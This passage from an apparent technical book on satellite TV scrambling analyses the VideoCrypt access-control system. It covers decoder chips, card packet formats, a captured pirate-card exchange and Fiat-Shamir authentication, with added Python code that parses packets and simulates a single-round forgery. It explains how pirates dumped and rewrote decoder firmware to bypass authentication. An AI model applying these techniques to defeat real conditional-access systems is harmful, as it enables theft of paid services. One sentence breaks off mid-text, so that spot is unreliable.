means so they tried to use lawyers to fix it. It was like using a band-aid to fix 
a decapitation but with far messier effects. However the impending 
legislation in Europe may change things slightly. 
The cover page of the VideoCrypt European Patent Application 


At this point in time VideoCrypt looks very old. But then it was developed in 
the mid eighties. For that time period it was an elegant compromise in terms 
of engineering. 


When the system was launched, some of the public relations people 
claimed that it was the most pirateproof system yet devised. This 
pirateproof attribute was a myth. A myth is an attempt to explain a reality 
with the mental tools available. Therefore since the public relations people 
neither understood the abilities of hackers or the security of the system it 
would be, to them at least, pirateproof. 


The philosophy of the VideoCrypt system is that of the Detachable Secure 
Processor. The decoder itself is merely a dumb terminal. The detachable 
secure processor is the smart card. Theoretically the smart card contains 
the critical data and the decoder contains nothing of significance. This 
“dumb terminal” idea has been echoed by and about News Datacom and 
Sky executives. 


The decoder only contains the masked ROM 6805 and the masked ROM 
8052. Both of these chips have been popped. Indeed the 8052 was 
unprotected. The 6805 contains most of the off-air data processing routines 
whereas the 8052 is the housekeeper. 


A great and respected mathematician, Professor Adi Shamir, was intro- 
duced as the creator of the algorithms used in the system. The News 
Datacom promotional material contained great claims of how the smart 
cards had to authenticate themselves every few seconds. As this authenti- 
cation procedure was unbeatable, there was no way that a pirate smart card 
could be used with this system. 


The Fiat-Shamir Zero Knowledge Test is the actual authentication proce- 
dure and it is indeed extremely difficult if not practically impossible to defeat 
when used properly. Right, I know what you are thinking - if the 
authentication procedure was so good then why was the system hacked 
with pirate smart cards? The answer to that will become glaringly apparent. 


Apart from the obvious sources of information, there is another one. One 
that went by largely unnoticed. In 1990, News Datacom filed a patent 
application for a European patent on the VideoCrypt system. It did not 
specifically refer to VideoCrypt and as a result it went largely unnoticed. 
Instead most hackers went after the Thomson patents. 


The application was filed by News Data Security Products Limited of Hong 
Kong. The inventors were Michael Cohen and Jonathan Hashkes of Israel. 


7: Video Manipulative Systems 


A few years ago, Interspace published a rather irate letter from Jonathan 
Hashkes of News Datacom. In the letter he criticised all hacks on the 
system as being "Shillelagh Hacks". At the time I was not sure whether this 
was a personal insult or a demonstration of ignorance. In a reply, I pointed 
out that a Shillelagh was a large stick for performing brain surgery without 
an anaesthetic and the hacks on VideoCrypt would have a similar effect. 
Little more was heard of Mr Hashkes until the discovery of the patent 
application. 


When I read the patent application, I could not help noticing that it cited the 
Baylin Publications book, "Satellite and Cable TV Scrambling and 
Descrambling" by Frank Baylin and Brent Gale. It was a particularly bad book 
on which to base judgments about the security of any scrambling system. Of 
course if they believed that that book was written by hackers then it is easy 
to see why VideoCrypt was hacked. 


In the summary of the invention, it was claimed that the invention, VideoCrypt, 
would provide improved apparatus and techniques for controlling access to 
broadcast transmissions. It would also include a public key proof, preferably 
a Fiat-Shamir public key proof, that would authenticate the smart card to the 
decoder. 


The patent application gave very comprehensive information on the system 
architecture. Indeed it was startling to see how little the system had 
changed in implementation. It confirmed many of the theoretical outlines 
that had been built up from various sources over the last few years. There 
were even examples, in object code, of some of the programs used in the 
system. 


The information in the patent application, while being old, does give an 
insight to the access control architecture in the VideoCrypt system. What 
emerges is more of a low budget system than contemporary systems such 
as EuroCrypt. More importantly for the era, the emphasis was on a cheap 
affordable solution rather than the all encompassing system. 


The decoder is effectively a terminal and does not contain any keys. There 
is even talk of a mail box option for sending messages to individual users. In 
this respect it is similar to the old BSB EuroCypher system which had a 
rather elegant messaging system. 


If anything, the VideoCrypt system drew heavily on previous systems though 
the use of the Fiat Shamir ZKT was new. Above all it seemed to be an 
attempt to get something in place that was effective, cheap and quick to 
assemble. 




The VideoCrypt Subscriber Management System 


The information on the VideoCrypt Subscriber Management System was 
largely gathered from the patent. Indeed it would seem that the main part of 
the structure of the SMS has not changed. The addressing is still carried out 
via the 32 byte 74h packets. 


From the pictures in the News Datacom brochures, a large number of 
terminals are linked to the customer service computer. This would tend to 
indicate that it is perhaps a large network based on a mainframe. The actual 
brand of computer used as the service computer is not known but given 
that most of the architecture is IBM, an IBM mainframe would not be 
unthinkable. In the early days Amstrad 1640s or Amstrad 1512s were in use 
as terminals though this seems to have changed judging from the pictures. 


The subscription management system is, apparently, based in Livingstone 
in Scotland. They prepare a set of magnetic tape cartridges with customer 
details, such as subscriber numbers and channels purchased, which are 
then sent to News Datacom's premises in Maidenhead in England. The 
subscriber smart cards are personalised at the Maidenhead premises and 
are then shipped to the subscribers. 


In the patent, the architecture of the subscriber management is based on 
individual computers. It would be more accurate to classify these elements 
in the structure as computer programs rather than distinct computers. They 
would of course be networked. Each channel would require its own 
separate master card or else the key could be generated from the 8052 
verifier. 


The generation of the key from the 8052 verifier would be the most logical 
method of generating the key for the free access mode. A large table of 256 
bytes is present in each 8052. This could be used as the data for the public 
modulus for the Fiat Shamir ZKT, but it could also be used as the code table 
for the decryption key generation. 


The Security Computer: 


According to the patent, this would be an IBM AT computer with multiple 
serial ports. The most likely configuration, today, would be a 486 or better 
with a multiple serial port card. 


The function of the security computer is to act as a hub for the other 
computers in the network. It has to combine information from the Security 
Database Computer, the Subscriber Management System and the master 
smart card. The information from the Security Computer is passed to the 
broadcast VideoCrypt encoder. 


The subscriber management system is based in Livingstone in 
Scotland but the main studio facility is near London. This would imply 
that there is a leased line system (perhaps ISDN) between the points. 


A master smart card is used to generate the seeds for scrambling 
though the verifier chip (8052) can also be used. This would probably 
account for the spurious reports of decoders decoding pay channels 
without cards. 


In the patent, the implementation for one channel was shown. With the 
number of channels operating at the moment, a separate Security Compu- 
ter would be required for each channel. 


The Subscriber Management System: 


This computer system is linked to the customer service computer and 
generates the list of cards to be turned off and the list to be turned on. 


The patent mentions that the subscriber management computer system 
could be based on a mainframe. The logical option here would be an IBM 
mainframe as the rest of the system appears to be IBM flavoured. 


The Security Database Computer: 


The Security Database Computer supplies the Security Computer with the 
operational information on the programmes and pay per view. The 
operational information deals with items such as the identification, rating 
and duration and grouping of the programme being broadcast. 


Video Scrambling 


The scrambling technique used in VideoCrypt is line cut and rotate. The 
video is digitised and then cut at one of 256 possible points. The digitised 
video segments are then rotated about this point and the digital video is 
converted back to analogue. 


The fact that the cut point is one of 256 points means that it can be defined 
as an eight bit word. This byte is supplied by a Pseudo Random Number 
Generator. The PRNG is sixty stages long and is reset approximately every 
two and a half seconds. 


VideoCrypt transmits addressing and access control data in a few lines of 
the VBI. The data rate is slower than that of teletext. Each of the packets of 
data has a checksum. This checksum is a product of the active data in the 
packets. 


Only 585 lines or so in each frame are scrambled. This is to enable the VBI 
signals to be checked without descrambling the video. The reason for this is 
so that the signal quality can be checked on SMATV and cablenets without 
having to descramble the signal. It is a standard feature on most scrambling 
systems. 
Decoder Architecture 


The VideoCrypt stand alone decoder is a hybrid design. It uses both 
discrete components and surface mount components. This is necessary to 
reduce the size of the board. The board type used in the early stand alone 
decoders is SRBP or synthetic resin bonded paper. It is not the most 
reliable of board materials but it is one of the cheapest. It does reflect the 
television manufacturing industry as most of the boards in television 
receivers are SRBP. 


In the IRD version, the power supply is part of the main receiver PSU. There 
are four voltage rails in the decoder: +21V, +12V5, +15V and +5V. The main 
part of the circuitry runs off of the +5V0 rail. 


There are an estimated ten different VideoCrypt IRD designs on the market. 
Though the operation in each case is largely the same, they have been 
tweaked for operation with a particular receiver design. 


The circuit diagrams for the VideoCrypt decoders are issued to authorised 
service centres on supposedly photocopy proof paper. This of course is a 
quaint if stupid move. Most television engineers have been able to obtain a 
circuit diagram as they have been on the market for the last few years. 


The House Keeper Microcontroller: 


The main processor in the descrambler is the 8052 from Intel. This is a 
microcontroller and has an on-chip ROM and RAM. There are also two 
types of this microcontroller available: the BASIC ROM version and the 
Mask programmable version. The version used in the descrambler is the 
Mask version. This means that there is an 8K program running the decoder. 
The 8052 can be forced to disgorge the control program. 


Many veteran hackers who examined the Sky decoder were suspicious of 
the ease with which the 8052 could be forced to disgorge the control 
program. 


There are a few theories as to why the ROM in this chip was not protected. 
The most obvious one had to do with the rate at which the chip failed. As 
this chip handled the card interface, it would be the one that the hackers 
would start to play with. As a result it would be the one most frequently 
destroyed "accidentally". Rather than have a service centre stocked with 
replacement 8052s, an EPROM version could be blown and inserted in 
place of the original. 


The other theory is based on stupidity. If you have designed an invincible 
system, protecting the ROM would be just icing on the cake. VideoCrypt 
was far from invincible. The ROM in the VideoCrypt II decoder is protected 
but that was to little avail. It was quickly popped and examined. 


Of course the fact that the program in the 8052 could be read and examined 
meant that the whole card to secure processor interface could be monitored 
and where necessary the data could be modified. This fact led to one of 
the most devastating hacks on VideoCrypt - The KENtucky Fried Chip. 


The information in the VideoCrypt patent application was largely duplicated 
in the VideoCrypt I 8052 right down to that 256 byte data table. There are 
minor differences between the implementations but they are, apparently, 
largely the same. 


Other aspects of the system became clear. The decoder could use both 
smart cards and memory cards. When the decoder was using memory 
cards, it would use an internal algorithm to generate the seed. This meant 
that a decryption algorithm had to be present in the actual decoder. 


There is an element of the 8052 that is not in current use on the Sky 
channels. The Fiat Shamir Zero Knowledge Test is an integral part of the 
security of VideoCrypt. It is the one thing that, the brochures claimed, would 
stop the pirate clone cards. 


In fact if the Fiat Shamir Zero Knowledge Test had been in operation then 
the 07 piracy could not have taken place. All the pirate cards contained was 
the algorithm and code table to descramble the video. 


The Adult Channel is currently using a very old version of the VideoCrypt 
system and it periodically triggers the Fiat Shamir Zero Knowledge Test but 
strangely the pirate card passes the test. This does tend to point to 
something being very wrong here. 


Shortly after the smart card is reset, it sends its identity number to the 
decoder. All of the pirate smart cards that I tested returned a string of 
zeroes. Their identity number was 00 00 00 00 00 00. The decoder did not 
reject this identity number and indeed I do not think that any VideoCrypt 
decoder rejected it. The most obvious hack trap was ignored. The decoder 
did not even check to see if the identity number was false. Of course the 
hackers would try to play false identity numbers but at the very least the 
decoder should have rejected such an obvious fake identity number. 


The Fiat Shamir packets transmitted by the smart card on the Adult channel 
are each 64 bytes of zeroes. Since one of the numbers being used in the 
process is zero then it would seem that the response is indeed correct 
however to allow such an obvious fake response. 
The Fiat Shamir Zero Knowledge Test is actually a very difficult thing to 
fake. Indeed properly implemented, it would have made VideoCrypt a very 
difficult system to hack. The fact that the decoder has to contain the 
routines to execute the test points to where the problem lies. 


What happens if the hacker can watch the whole protocol taking place and 
can actually emulate the protocols? The 8052 was unprotected. Its program 
was dumped and In Circuit Emulators (ICE) were used to experiment with 
the program in operation in real time. 


The routines dealing with the Fiat Shamir ZKT could quickly be established. 
The results would, hypothetically, set a flag in the program. Now what 
happens if the hackers could rewrite the 8052 program replacing the ZKT 
with a sequence of loops that provided a similar delay? To put it simply it 
defeats the purpose of ZKT. Of course rewriting the 8052 is nothing new to 
hackers. The KENtucky Fried Chip and the very first versions of the Ho Lee 
Fook proved that. 


It is difficult to believe that the people responsible for the overall design of 
the VideoCrypt system could have envisaged the forces massed against 
them. Perhaps they really believed that they had invented an unhackable 
system. Though the overall design of the VideoCrypt decoder is good, you 
tend to get the feeling that the people who designed the operating system 
and implemented the authentication scheme were most definitely not 
hackers. 


Perhaps some of the problems that plagued the VideoCrypt-I design have 
been fixed in the VideoCrypt-II decoder. There were some interesting 
claims made on the improved security of the system. Again the 8052 and 
the 6805 chips in that decoder have been popped and the programs are 
currently undergoing analysis. 


The Secure Processor: 


The real processing heart of the Sky decoder is the ZC404044 or in later 
versions the ZC404047. The earlier decoders have an eight pin 9306 
EEPROM. The later versions incorporate the EEPROM data on the 
ZC404047. The control program is held in masked ROM and as such is very 
difficult to read. However it was not impossible to read. In fact popping this 
chip was an essential part of the hack. 


The first problem here was to identify the chip. The incriminating text on the 
chip proved that the ZC404044 was a Motorola microcontroller. ZC was a 
prefix generally used for customised versions. There was one other way of 
getting confirmation - phone Motorola, the manufacturers of the chip, and 
ask them about the IC. The ZC404047 designation was replaced by a rather 
generic Thomson number but the fact that the chip was tracked down 
helped. It was a mask ROM version of a 6805 microcontroller. 


Fiat Shamir Zero Knowledge Test In Operation? 

RESET:   3F FA 11 25 05 00 01 B0 02 3B 36 4D 59 02 81 80 

DCDR 72: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
CARD 70: 00 00 00 00 00 00 
CARD 7A: D8 53 45 41 53 4F 4E 37 20 56 31 43 33 20 20 20 
         30 30 3A 34 38 20 20 20 20 

CARD 7C: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
DCDR 74: E8 42 3A 20 4B 1E 01 FB 7E 86 78 AA AB AD AE B2 
         B5 B9 BB BC 00 00 00 00 00 00 00 DD FF 9E 0C CE 

CARD 78: D3 5B 02 60 B9 65 6B 0D 
CARD 7A: 80 53 45 41 53 4F 4E 37 20 56 31 43 33 41 44 55 
         4C 54 43 48 41 4E 4E 45 4C 

CARD 7C: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
CARD 7E: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
         00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
         00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
         00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

DCDR 80: 01 
CARD 82: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
         00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
         00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
         00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

CARD 70: 00 00 00 00 00 00 
DCDR 74: E0 42 3A 20 55 74 01 EB 7E 86 78 E2 E3 E4 E5 E6 
         E7 E9 EA 00 00 00 00 00 00 E9 DD 33 D2 58 


The data snatch above shows the decoder requesting the card to 
authenticate itself. The card is a pirate one (actually the DDT running 
on a PC). As can be seen the ZKT fails but the decoder does not shut 
down. The decoder continued to decode the picture. The card identity 
number returned by the pirate card was 00 00 00 00 00 00. The 
decoder should have at least recognised this evidently false identity 
number. 


The function of the 6805 is to act mainly as the over the air data 
demodulator. This information is actually given in the patent application 
though the specific chip type is not mentioned. It also passes the relevant 
data packets to the 8052 housekeeper. 


Again the patent application is very specific about the actual traffic and 
protocol. It even gives the waveforms associated with the procedures. The 
main data packet passed to the 8052 is the 32 byte 74h packet. 


Much of the on screen messaging is controlled by the 6805. It is effectively 
the main processor of the decoder. It also generates a new seed for the 
PRNG in the custom logic chip at the start of each field. The eight byte 
decryption key is apparently combined with the frame counter to produce 
these seeds. 


The Custom Logic 


TC110G03AP is custom logic. It handles the control of the video descram- 
bling circuitry. This is also the most likely area for the PRNG. On some of 
the later versions of VideoCrypt decoders this part is labeled TCE PTV-2. 
The TCE possibly standing for Thomson Consumer Electronics. This IC 
also handles the clock generation for the whole decoder. The IC's clock is 
derived from a 28 MHz crystal. 


According to the information given in the VideoCrypt brochures, the 
PRNG or Pseudo Random Sequencer was sixty stages long. This is a very 
convenient length, as the eight byte hash function output carries the 
reseeding value and possibly four status flags, which are apparently 
unused. 


The exact nature of the PRNG is not known yet. The chip also includes the 
multiplexing control circuitry. This generates the control signals for the video 
storage lines and switching. 


The Video Descrambler 


The video section of the VideoCrypt decoder is elegantly simple. The 
scrambled video is digitised by a TDA8703 ADC. This turns the video into a 
sequence of 8 bit words. The digitised video is then fed to a set of two FIFO 
memories. FIFO stands for first in first out. These ICs are capable of storing 
910 8 bit words each. 
Each FIFO holds one segment of the line so that reassembling the video is 
merely a question of switching between the two FIFOs when clocking out 
the data. The descrambled digitised video, with the segments in the correct 
order, is fed to a TDA8702 DAC. 


The multiplexing and latching is controlled by the custom logic IC. The 
analogue video is then fed to the output stage. This stage is a discrete 
transistor design. The video signal is clamped and the on screen graphics 
are added. The resulting signal is filtered before being routed to the SCART 
connector or back into the receiver. 


The VideoCrypt-1 Card Protocol 


There is a finite number of packet types in the VideoCrypt system. After a lot 
of observation and experimentation, the function of each packet is almost 
completely known. Some areas such as the card addressing have changed 
over the different card issues. The 09 issue introduced a simple month code 
based encryption on the 74h packet. 


When compared with a system like EuroCrypt-M, VideoCrypt is indeed a 
very sparse one. There are only ten recognised packet types in use. At this 
stage it is not known if the VideoCrypt II protocol has any additional packet 
types. However the utilisation of the packets in the VideoCrypt system is in 
many respects more elegant. 


• Instruction: 70h 
Direction: Card to Decoder 
Length: 6 Bytes 
Contents: Card Identification Number 


Each smart card has its own serial number. This serial number is six bytes 
long and is split into three areas: the card issue byte, the card identification 
number and the checksum. 


The card issue is represented by a single byte. The high nybble always 
seems to be 2. This may indicate that the card type is smart rather than a 
simple memory card. The low nybble gives the issue number. The current 
issue is 0A and the last issue was 09. The next issue will be 0B. 


The second area is the card identification area. This is a four byte number 
that contains the card identity. The last area is a checksum for the card 
identity. 
• Instruction: 72h 
Direction: Decoder to Card 
Length: 16 Bytes 
Contents: Previous Card ID, PPV and Tiering Information 


When a card is inserted into the decoder, the decoder will send a message 
to the card containing the four bytes of the card ID and other information. 
The other information probably has to do with the authorisation level of the 
card, the amount of PPV tokens remaining and whether the card is being 
chained. 


The chaining process was designed so that each decoder would be 
imprinted with a card serial number and to allow the credits or tokens 
remaining in old cards to be transferred to the new subscriber cards. The 
system was designed when EPROM cards were the dominant form of smart 
cards. The chaining process does not appear to be used in Europe. 


• Instruction: 74h 
Direction: Decoder to Card 
Length: 32 Bytes 
Contents: Message block (addressing & key data) 


This is the workhorse of the VideoCrypt system. This message packet 
carries all of the card turn on and turn off codes. It is also used as the data 
for the hash function that generates the decryption key. Since the transition 
from the 09 to the 10 (0A) card, the packet structure of the 74h has not 
been completely established. The information below relates to the 09 
packet structure. 


The data in this packet has a 27 - 4 - 1 structure. The first twenty seven 
bytes contain the decoder flags, the card addressing instructions, the 
channel identifier and the card addresses affected by this packet. The next 
four bytes are a hash function checksum. When the packet is processed by 
the hash function, part of the results in stages 28, 29, 30 and 31 should 
equal the bytes in these checksum bytes. The card will reject packets that 
do not have a valid checksum. The function of the checksum is to prevent a 
chosen plaintext attack on the hash function or a third party authorisation of 
a smart card. Of course when the 09 hash algorithm was compromised, the 
whole access control management system collapsed as it was possible to 
emulate the control messages from the headend to turn on and upgrade 
cards. 
The final byte is a packet checksum. The value of this byte is that required 
to bring the sum of the bytes in the packet to a multiple of 256. 


Byte 0 in this packet carries the decoder flags. It effectively tells the decoder 
how the packet is to be handled. The high nybble identifies the type of 
scrambling in use. A value of Cxh indicates that the channel is not 
scrambled. A value of Exh or Fxh indicates that the channel is hard 
scrambled. The Dxh value may indicate a free access mode of scrambling. 
The value x8h as the low nybble indicates that the packet is to be used to 
generate a new decryption key. The value x0h indicates that the packet is 
an information packet and is not to be used to generate a new key. 
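A decoder-side parser for the 09-era 74h packet as laid out above, run over the DCDR 74 packet captured in the data snatch earlier on this page. This is an added example, not code from the book or from News Datacom: the packet checksum and the flag readings are the page's, the "free access" label for Dxh is marked tentative because the page itself only says "may", and the four byte hash checksum is merely split out because the card's hash function is not given on the page.

```python
from dataclasses import dataclass

PACKET_LEN = 32  # 27 data bytes + 4 hash check bytes + 1 packet checksum byte

# Byte 0, high nybble: type of scrambling in use (readings from the page).
SCRAMBLE_MODES = {
    0xC: "clear",
    0xD: "free access (tentative reading)",
    0xE: "hard scrambled",
    0xF: "hard scrambled",
}
# Byte 0, low nybble: x8h = use packet to generate a new key, x0h = info only.
KEY_NYBBLE, INFO_NYBBLE = 0x8, 0x0


@dataclass
class Packet74:
    flags: int           # byte 0
    scramble_mode: str
    key_packet: bool
    body: bytes          # bytes 1..26: addressing instructions, channel id, card addresses
    hash_check: bytes    # bytes 27..30: compared by the card with hash stages 28..31
    checksum: int        # byte 31


def packet_checksum(first31: bytes) -> int:
    """Byte 31: the value that brings the sum of all 32 bytes to a multiple of 256."""
    return (-sum(first31)) & 0xFF


def parse_74h(packet: bytes) -> Packet74:
    """Validate length, packet checksum and decoder flags, then split the fields.
    Raises ValueError on anything a decoder should refuse to act on."""
    if len(packet) != PACKET_LEN:
        raise ValueError(f"74h packet must be {PACKET_LEN} bytes, got {len(packet)}")
    if sum(packet) & 0xFF:
        raise ValueError("packet checksum failed: byte sum is not a multiple of 256")
    flags = packet[0]
    mode = SCRAMBLE_MODES.get(flags >> 4)
    if mode is None:
        raise ValueError(f"unknown scrambling nybble {flags >> 4:X}xh")
    low = flags & 0xF
    if low not in (KEY_NYBBLE, INFO_NYBBLE):
        raise ValueError(f"unknown packet-use nybble x{low:X}h")
    return Packet74(flags, mode, low == KEY_NYBBLE,
                    packet[1:27], packet[27:31], packet[31])


def build_74h(flags: int, body: bytes, hash_check: bytes) -> bytes:
    """Assemble the 27 + 4 bytes and append the packet checksum."""
    if len(body) != 26 or len(hash_check) != 4:
        raise ValueError("body must be 26 bytes and hash_check 4 bytes")
    first31 = bytes([flags]) + body + hash_check
    return first31 + bytes([packet_checksum(first31)])


def is_valid_74h(packet: bytes) -> bool:
    """Convenience wrapper: True if parse_74h accepts the packet."""
    try:
        parse_74h(packet)
        return True
    except ValueError:
        return False


# The first DCDR 74 packet from the data snatch on this page: flags E8h
# (hard scrambled, key-generating), hash check DD FF 9E 0C, checksum CEh.
CAPTURED_74H = bytes.fromhex(
    "E8 42 3A 20 4B 1E 01 FB 7E 86 78 AA AB AD AE B2"
    "B5 B9 BB BC 00 00 00 00 00 00 00 DD FF 9E 0C CE"
)

if __name__ == "__main__":
    p = parse_74h(CAPTURED_74H)
    print(p.scramble_mode, "| key packet" if p.key_packet else "| info packet",
          "| hash check", p.hash_check.hex(), "| checksum", f"{p.checksum:02X}")
    corrupted = bytearray(CAPTURED_74H)
    corrupted[5] ^= 0x01          # one flipped bit is caught by the packet checksum
    print("corrupted copy accepted:", is_valid_74h(bytes(corrupted)))
```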


• Instruction: 76h 
Direction: Decoder to Card 
Length: 1 Byte 
Contents: The Authorise button has been pressed 


This packet instructs the card that the Authorise button on the decoder has 
been pressed. If the programme is a Pay Per View programme then the 
card will deduct the correct number of tokens from the PPV reservoir. 

This instruction was used by hackers during the lifetimes of the 07 and 09 
hacks. When the Authorise button was pressed, the pirate card would cycle 
through all of the fixes for known ECMs stored in the card. 

This command is now a vestige of more naive times when VideoCrypt was 
considered secure. Impulse PPV with a token reservoir on the card is now a 
thing of the past as the security of the card cannot be guaranteed. Sky's first 
public PPV event was a pre-booked event where the subscriber had to ring 
the subscriber management centre to have the card authorised over the air. 


• Instruction: 78h 
Direction: Card to Decoder 
Length: 8 Bytes 
Contents: The Decryption Key 


This is the eight byte decryption key generated by the hash function in the 
smart card. This key is passed to the Pseudo Random Number Generator 
in the Custom Logic IC. Only 60 Bits of this result is used to seed the 
PRNG. 
• Instruction: 7Ah 
Direction: Card to Decoder 
Length: 25 Bytes 
Contents: On Screen Message data 


The data in this packet is the text to be displayed on the screen. The text is 
displayed on screen in two rows of twelve characters. Depending on the 
state of the bits in the first byte, the message can be suppressed or shown. 
Currently on some of the Sky channels, the message "THIS PROGRAMME 
IS BLOCKED" is present but not shown on the screen. This indicates that 
the present 09 version of VideoCrypt is already being set for PPV on Sky 
channels. 


• Instruction: 7Ch 
Direction: Card to Decoder 
Length: 16 Bytes 
Contents: Card ID, PPV and Tiering information 


This packet of information appears to be the card ID, PPV and Tiering 
information. The fact that this message packet always precedes the Fiat 
Shamir ZKT sequence could indicate that this information packet is used in 
the ZKT. 


• Instruction: 7Eh 
Direction: Card To Decoder 
Length: 64 Bytes 
Contents: Fiat Shamir ZKT X Value 

This packet of data contains the X commitment from the card. The value is 
the result of X = R^2 mod N where R is an arbitrary number. Though it is not 
yet known, this number R may be taken from the code table. 


• Instruction: 80h 
Direction: Decoder to Card 
Length: 1 Byte 
Contents: The Q Flag for the Fiat Shamir ZKT 


In the Fiat Shamir ZKT protocol used in the VideoCrypt system there are 
two possible values - 00h and 01h. This byte tells the card how to calculate 
the response for the Fiat Shamir Zero Knowledge Test. 
• Instruction: 82h 
Direction: Card to Decoder 
Length: 64 Bytes 
Contents: The Card response for the Fiat Shamir ZKT 

Again the nature of this response depends on whether the Q byte was 00h 
or 01h. This flag tells the card how to generate the response Y. If the Q byte 
is 00h then the response is Y = R. If the Q byte is 01h then the response is 
Y = (R*S) mod N. R is a number from a table in the smart card and S is the 
card's secret value, derived from the card identity number as described 
below. 

The card is authenticated by the decoder if the following results are 
obtained: 

Y^2 = X mod N          [if Q = 00h] 
Y^2 = (X*V) mod N      [if Q = 01h] 

The decoder will have received V prior to the authentication process. 

This number V is the card identity number and S is derived from it as 
S = sqrt(V) mod N, a square root that can only be computed by whoever 
knows the factors of N. The random R masks S in the 01h response, so the 
decoder learns nothing about S from Y. 


Other Instructions 


The most important instruction not listed above is the 86h command. This 
appears to be the card personalisation command and it was present in the 
09 card. It also appears to be present in the 10 card and it was used by 
hackers to activate the March 17 1996 PPV event. 


The Fiat Shamir ZKT In VideoCrypt 


As was mentioned previously, the only European channel that is apparently 
still using the ZKT as part of their datastream is The Adult Channel. The 
procedure is listed below. 


70: Card sends V (card identity number) to decoder 
7C: Card sends identification and (possibly) N to decoder 
7E: Card sends 64 byte packet X to decoder 
80: Decoder sends Q byte to card 
82: Card sends Y response to the decoder 
70: Card sends identity number to decoder 


The sequence above would follow the model for the ZKT presented in 
chapter 6. However the public modulus N may actually be sent by the card 
to the decoder as a part of the 7C packet. Then the Q byte would dictate the 
type of Y response and the card would send that response in the 82h 
packet. 

The problem here is that the exact structure of the 7Ch packet is not known. 
This packet may contain the public modulus N as well as part of the card 
identity number. 
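The 7Eh/80h/82h exchange and the decoder check described above, worked through as an added example. This is not code from the book or from News Datacom: the modulus is a toy product of two Mersenne primes rather than the unknown VideoCrypt N, the packet framing is left out, and the forged_round function is added to show why the Q byte matters, since a card that holds no secret S can still pass any single round on which it guessed Q correctly.

```python
from __future__ import annotations

import math
import secrets

# Toy modulus built from two known Mersenne primes. The real VideoCrypt N is
# not given on the page; a 64-byte X packet implies a modulus of about 512 bits.
P = (1 << 31) - 1
Q_PRIME = (1 << 61) - 1
N = P * Q_PRIME


def make_card_secret(n: int = N) -> tuple[int, int]:
    """Card personalisation: secret S and public identity V = S^2 mod N."""
    while True:
        s = secrets.randbelow(n - 2) + 2
        if math.gcd(s, n) == 1:
            return s, pow(s, 2, n)


def card_commit(n: int = N) -> tuple[int, int]:
    """7Eh packet: pick a fresh R and send X = R^2 mod N."""
    r = secrets.randbelow(n - 1) + 1
    return r, pow(r, 2, n)


def card_respond(r: int, s: int, q: int, n: int = N) -> int:
    """82h packet: Y = R if Q = 00h, Y = R*S mod N if Q = 01h."""
    if q not in (0, 1):
        raise ValueError("Q byte must be 00h or 01h")
    return r if q == 0 else (r * s) % n


def decoder_verify(x: int, y: int, v: int, q: int, n: int = N) -> bool:
    """Decoder check: Y^2 == X (Q = 00h) or Y^2 == X*V (Q = 01h), all mod N."""
    expected = x if q == 0 else (x * v) % n
    return pow(y, 2, n) == expected


def honest_round(s: int, v: int, q: int) -> bool:
    """One full round for a card that really holds S."""
    r, x = card_commit()
    y = card_respond(r, s, q)
    return decoder_verify(x, y, v, q)


def forged_round(v: int, q_guess: int, q_actual: int) -> bool:
    """A card that does not know S but guesses the Q byte before committing.

    Guess 00h: commit honestly to X = R^2 and answer Y = R.
    Guess 01h: choose Y = R first and commit to X = R^2 * V^-1 mod N, so that
    Y^2 == X*V holds without S ever being known.
    Either way the forgery only survives if the guess was right.
    """
    r = secrets.randbelow(N - 1) + 1
    if q_guess == 0:
        x = pow(r, 2, N)
    else:
        x = (pow(r, 2, N) * pow(v, -1, N)) % N
    return decoder_verify(x, r, v, q_actual)


def forgery_success_rate(v: int, rounds: int = 200) -> float:
    """Fraction of rounds a secret-less card passes against a random Q byte."""
    hits = 0
    for _ in range(rounds):
        hits += forged_round(v, secrets.randbelow(2), secrets.randbelow(2))
    return hits / rounds


if __name__ == "__main__":
    S, V = make_card_secret()
    print("honest Q=00h:", honest_round(S, V, 0), " honest Q=01h:", honest_round(S, V, 1))
    print("secret-less card pass rate:", forgery_success_rate(V))
```

With one Q byte per sequence, which is what the packet listing above shows, a card holding no secret passes about half the time. The 2^-k soundness of Fiat-Shamir only appears after k independent rounds, and only if the card cannot predict Q before it commits X.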


The ZKT obviously does not work on the Adult Channel. If it did then the 
decoder would reject the pirate cards. Instead the pirate cards just keep on 
working. The ZKT packet sequence was not seen on issue 07. It was 
used on the 09 issue to try and knock out pirate cards. However it was 
easily overcome by hackers and pirates. 


The ZKT is used more effectively in the VideoCrypt-II specification where 
the card has to calculate a ZKT result and EXOR the seed value against this 
calculated ZKT result. This means that the card has to effectively 
authenticate itself, and an algorithm and keys hack only, as used on the 07 
VideoCrypt hack, does not work. The algorithm in the VideoCrypt-II card is 
apparently the same as that used in the 07 Sky card. Of course the keys 
and baudrates are different. 


Given that the Fiat-Shamir ZKT is used so heavily in the VideoCrypt-I and 
VideoCrypt-II systems, it is not surprising to see it being used in all of the 
other systems that News Datacom designs. The algorithm is good and once 
the protocols have been properly implemented, it is very difficult for any 
hacker to crack it successfully and repeatedly. The paper by Fiat and 
Shamir, "How To Prove Yourself", presented at Crypto '86, is widely posted 
on FTP sites and BBSes. 


The one thing that the Fiat-Shamir relies on is secret information or data. 
This is essential to the correct operation of the scheme. But the problem for 
the implementations of this algorithm, especially in the satellite television 
applications where it has been employed, is that the secret data must be 
exactly that - secret! If it is not then the authentication procedure has been 
compromised. 


This compromise resulted in the collapse of the security on the 07 Sky card. 
Had it worked properly (the decoder 8052s were buggy), the 07 Ho Lee Fook 
would not have been as successful. 


It seems that News Datacom made great play of the fact that their system 
contained this algorithm but when it came to the crunch it was the 
technology that was compromised. This goes to prove one important thing - 
it does not matter how brilliant the algorithms and authentication protocols 
are, once the technology is compromised the system is dead. The only thing 
The VideoCrypt Hacks 


The following paragraphs briefly detail the various hacks on the VideoCrypt 
system. Each hack is covered in greater depth later in the chapter. 


VideoCrypt is not as secure a system as it was in the eighties. Much of this 
can be blamed on the fact that hacker technology has advanced whereas 
VideoCrypt remained largely frozen in silicon. It is basically an old system 
